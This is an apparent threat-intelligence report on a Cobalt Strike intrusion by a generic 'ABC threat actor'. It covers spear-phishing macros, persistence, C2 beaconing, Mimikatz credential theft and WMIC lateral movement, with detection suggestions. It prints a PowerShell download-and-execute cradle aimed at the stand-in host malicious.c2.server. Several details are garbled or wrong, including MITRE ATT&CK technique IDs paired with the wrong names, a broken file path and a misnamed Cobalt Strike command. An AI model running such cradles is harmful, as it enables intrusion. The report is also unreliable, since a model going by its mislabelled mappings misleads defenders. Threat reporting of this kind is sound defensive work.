Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- ABC threat actor leverages Cobalt Strike to establish initial access and maintain persistence within the target environment.
- The malware employs sophisticated techniques for lateral movement and data exfiltration, utilizing PowerShell and WMIC.
- Indicators of compromise (IOCs) include specific file hashes, command and control (C2) IP addresses, and registry modifications.
Executive Summary
During our analysis of a recent intrusion attributed to the ABC threat actor, we identified a series of tactics and techniques utilized to breach and maintain access within a targeted corporate network. The threat actor employed a variant of **Cobalt Strike** as their primary tool for establishing malicious command and control, executing payloads, and conducting lateral movement post-initial access. Our investigation revealed several vulnerabilities exploited in the environment, enabling the actor to circumvent conventional security measures.
Initial Access
The initial access vector used by the ABC threat actor was primarily spear-phishing emails containing malicious attachments. In the sample we examined, the attachment was a **Microsoft Excel** file that utilized VBA macros to execute a PowerShell command for downloading the **Cobalt Strike** payload. The macro execution was triggered when the recipient enabled macros as prompted by a social engineering technique.
Our team identified the attachment name as `Invoice_Details.xlsm`, which included obfuscated macro code designed to avoid detection by conventional email filtering solutions. The PowerShell command executed was `Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.c2.server/payload.ps1')`, demonstrating a common method for downloading additional malicious payloads from external servers.
Execution & Persistence
Upon successful execution of the payload, **Cobalt Strike** created a persistent backdoor on the infected system. The sample we analyzed established persistence through two primary methods: by creating a scheduled task and modifying the registry entries to ensure activation on system boot. Specifically, it created a scheduled task with the name `TaskScheduler.exe` in `C: asks`.
Additionally, the malware made changes to the registry under the key `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` by adding a binary entry pointing to the location of its executable, ensuring that the implant would launch on every user logon.
Command and Control
The command and control infrastructure employed by the ABC threat actor was robust, relying on dynamically generated domain names and multiple IP addresses to obscure their activities. Our analysis revealed that the infected endpoint communicated with a configured domain, `malicious.c2.server`, periodically sending HTTP POST requests to beacon back to the C2 server for further instructions. The beaconing occurred at an interval of five minutes, which is a typical configuration pattern for **Cobalt Strike** deployments.
The communication pattern also included base64 encoded data payloads, often containing sensitive information related to the environment such as system configurations and user credentials that were captured via credential dumping techniques. One notable command observed during our analysis was `get_system`, designed to elevate the implant’s privileges further.
Lateral Movement & Discovery
Post-exploitation, the ABC threat actor demonstrated considerable skill in lateral movement across the network. They deployed **WMIC** commands and **PowerShell Remoting** to pivot between systems. For example, we observed the actor executing commands like `wmic /node:` to execute code on remote machines.
Moreover, the malware used **Kerberos Ticket Granting Ticket** (TGT) stealing techniques, utilizing the **Mimikatz** tool to obtain credentials from memory, facilitating further access. Our investigation found the presence of **DLL** files linked to these tools, hidden within system directories to avoid detection.
Impact & Objectives
The objectives of the ABC threat actor seemed to revolve around intellectual property theft and ransomware deployment capabilities. Throughout the incident, we noted commands executed to enumerate directory structures and gather information on files with specific extensions such as `.docx` and `.xlsx` — typical data indicative of business-related documents.
Additionally, a couple of attempts were made to deploy **ransomware** payloads strategically throughout the network, suggesting that secondary tactics were in play, aimed at leveraging the initial compromise for liquidating the assets of the target organization. Fortunately, rapid incident response efforts thwarted substantial data encryption from occurring.
MITRE ATT&CK Mapping
- T1566 – Phishing: Initial access was facilitated via targeted spear-phishing emails.
- T1203 – Exploit Public-Facing Application: Exploitation of vulnerabilities through malicious macro execution in Office documents.
- T1071.001 – Application Layer Protocol: Web Protocols: Communication between the implant and C2 used HTTP POST over web protocols.
- T1210 – Exploitation of CVE: Leveraged exploit for lateral movement via **WMIC**.
- T1086 – PowerShell: Utilized PowerShell scripts for malicious payload execution.
Detection Opportunities
- Monitor for unusual scheduled tasks creation or modifications, especially for tasks named `TaskScheduler.exe`.
- Implement detection for PowerShell command executions involving `Invoke-Expression` and `DownloadString` methods from Office documents.
- Analyze network traffic for anomalous outbound connections to known rogue C2 domains.
Analyst Notes
The incident served as a reminder of the evolving tactics threat actors employ to maintain persistence and execute their objectives effectively. As observed, the combination of social engineering, robust C2 setups, and lateral movement techniques can create significant challenges for incident response teams. Organizations must continuously enhance their monitoring capabilities and incident response strategies to adapt to these potential threats.
Source: Original Report